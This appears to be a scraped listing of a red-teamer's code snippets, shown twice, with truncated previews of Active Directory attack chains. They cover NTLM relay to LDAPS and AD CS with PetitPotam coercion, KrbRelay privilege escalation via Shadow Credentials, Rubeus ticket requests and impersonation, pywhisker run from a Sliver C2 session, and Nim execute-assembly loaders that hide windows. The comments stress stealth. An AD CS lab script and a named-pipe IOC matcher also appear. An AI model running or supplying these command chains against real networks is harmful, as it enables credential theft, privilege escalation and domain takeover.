zimnyaa

## pyd-executeassembly.nim
import winim/clr
import os
import nimpy

#Create dup handles
proc dup(oldfd: FileHandle): FileHandle {.importc, header: "unistd.h".}
proc dup2(oldfd: FileHandle, newfd: FileHandle): cint {.importc,
    header: "unistd.h".}


## vhdx-on-smb-share.sh
# runs on kali out-of-the-box

# this is not a ready-made script, more like a collection of commands

# QEMU mounting a drive
modprobe nbd max_part=16
qemu-nbd -c /dev/nbd0 filename.vhdx

# look for the second partition, usually where the FS resides
fdisk -l /dev/nbd0

## webclient-rbcd.sh
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

## nim-assembly-wrapper.py
import sys, os


nim_template = """import winim/clr
import os
import strutils


proc execute(assembly_bytes: openarray[byte], args: openarray[string])  =

## hidewindow.nim
when defined hidewindow:
  proc wndenumcallback(windowHandle: HWND, param: LPARAM): WINBOOL {.stdcall.} =
    var process_id: DwORD
    var wanted = cast[ptr DWORD](param)
    GetWindowThreadProcessId(windowHandle, &process_id);
    if process_id == wanted[]:
            ShowWindow(windowHandle, SW_FORCEMINIMIZE)
    return true

  proc hidewindow() =

## unpac-adcs.sh
# setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection
# (somewhere custom), or NTLM hash farming
python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support

# ntlmrelayx ADCS outputs an unencrypted .pfx
cat lowpriv.b64 | base64 --decode > lowpriv.pfx

# dirkjanm PKINITTools, had to patch impacket previously to output AES session keys
python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v

## krbrelay-lpe.sh
# creating RPC server, relaying SYSTEM Kerberos authentication to LDAP
# we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy
# clsid from cube0x0 KrbRelay repo
.\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1

# KrbRelay outputs a Rubeus command for you, but you do not need to unPAC
Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap

# PTH to SMB is a spook, better request a ticket
.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap

## adcs-lab.ps1

New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure

$azureDefaultLocation = 'Australia East' # CHANGETHIS

Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation

#defining default parameter values, as these ones are the same for all the machines
$PSDefaultParameterValues = @{
    'Add-LabMachineDefinition:DomainName' = 'contoso.com'

## iocpipe.py
import re, sys

def rule_startswith(ioc_string):
	def __match(pipename):
		if pipename.startswith(ioc_string):
			print("\tMATCH startswith({})".format(ioc_string))
			return True
		return False
	return __match

## shadowunpac.sh
# getting the current ticket
sliver (SESSION) > rubeus tgtdeleg /nowrap
echo <ticket> | base64 --decode > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache

# adding ms-KeyCredentialLink
proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert

# requesting a ticket with ShadowCredentials
proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache
	import winim/clr
	import os
	import nimpy

	#Create dup handles
	proc dup(oldfd: FileHandle): FileHandle {.importc, header: "unistd.h".}
	proc dup2(oldfd: FileHandle, newfd: FileHandle): cint {.importc,
	header: "unistd.h".}
	# runs on kali out-of-the-box

	# this is not a ready-made script, more like a collection of commands

	# QEMU mounting a drive
	modprobe nbd max_part=16
	qemu-nbd -c /dev/nbd0 filename.vhdx

	# look for the second partition, usually where the FS resides
	fdisk -l /dev/nbd0
	# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
	python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

	# setting up a LDAPS relay to grant RBCD to computer account we have
	# in my case MAQ = 0, so I escalated on a domain workstation and used it
	sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

	# PetitPotam to WebDAV with domain credentials (not patched)
	# DO NOT use FQDN here
	python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
	import sys, os


	nim_template = """import winim/clr
	import os
	import strutils



	proc execute(assembly_bytes: openarray[byte], args: openarray[string]) =
	when defined hidewindow:
	proc wndenumcallback(windowHandle: HWND, param: LPARAM): WINBOOL {.stdcall.} =
	var process_id: DwORD
	var wanted = cast[ptr DWORD](param)
	GetWindowThreadProcessId(windowHandle, &process_id);
	if process_id == wanted[]:
	ShowWindow(windowHandle, SW_FORCEMINIMIZE)
	return true

	proc hidewindow() =
	# setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection
	# (somewhere custom), or NTLM hash farming
	python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support

	# ntlmrelayx ADCS outputs an unencrypted .pfx
	cat lowpriv.b64 \| base64 --decode > lowpriv.pfx

	# dirkjanm PKINITTools, had to patch impacket previously to output AES session keys
	python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v
	# creating RPC server, relaying SYSTEM Kerberos authentication to LDAP
	# we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy
	# clsid from cube0x0 KrbRelay repo
	.\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1

	# KrbRelay outputs a Rubeus command for you, but you do not need to unPAC
	Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap

	# PTH to SMB is a spook, better request a ticket
	.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap

	New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure

	$azureDefaultLocation = 'Australia East' # CHANGETHIS

	Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation

	#defining default parameter values, as these ones are the same for all the machines
	$PSDefaultParameterValues = @{
	'Add-LabMachineDefinition:DomainName' = 'contoso.com'
	import re, sys

	def rule_startswith(ioc_string):
	def __match(pipename):
	if pipename.startswith(ioc_string):
	print("\tMATCH startswith({})".format(ioc_string))
	return True
	return False
	return __match
	# getting the current ticket
	sliver (SESSION) > rubeus tgtdeleg /nowrap
	echo <ticket> \| base64 --decode > ticket.kirbi
	ticketConverter.py ticket.kirbi ticket.ccache

	# adding ms-KeyCredentialLink
	proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert

	# requesting a ticket with ShadowCredentials
	proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache